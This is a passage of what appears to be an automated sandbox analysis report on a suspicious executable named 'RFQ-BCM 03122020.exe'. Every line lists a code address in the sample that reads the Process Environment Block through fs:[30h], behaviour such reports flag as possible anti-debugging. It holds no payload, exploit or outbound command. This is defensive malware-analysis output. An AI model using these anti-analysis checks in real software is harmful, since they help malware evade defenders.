          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C0B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B79080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B740E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B758EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B8B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C32073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C41074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C44015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C44015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B90050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B90050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B999BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B999BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B999BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B999BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B999BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BF69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C041E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B7B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B7B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B7B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C349A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B94120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B94120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B79100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B79100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B79100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B7B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B7B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B7C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B8AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B8AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B752A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C34AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BAD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BA2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B9A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C3EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C04257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00BB4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B7AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B7AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C2B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C2B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B93A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00C48A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B75210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exeCode function: 3_2_00B75210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B75210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B75210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B88A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BB927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C3AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B79240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BA4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BA4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BA4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C223E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C223E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C223E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BAB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BA2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B81B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B81B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C2D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C3138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BA03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C45BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BF53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BF53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C48B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B9A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BA3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BA3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B7DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C3131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B7F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B7DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C48CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00B8849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C314FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BF6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BF6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BF6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C34496 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C0C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00C0C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BABC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BF6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BAAC7B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RFQ-BCM 03122020.exe Code function: 3_2_00BAAC7B mov eax, dword ptr fs:[00000030h]
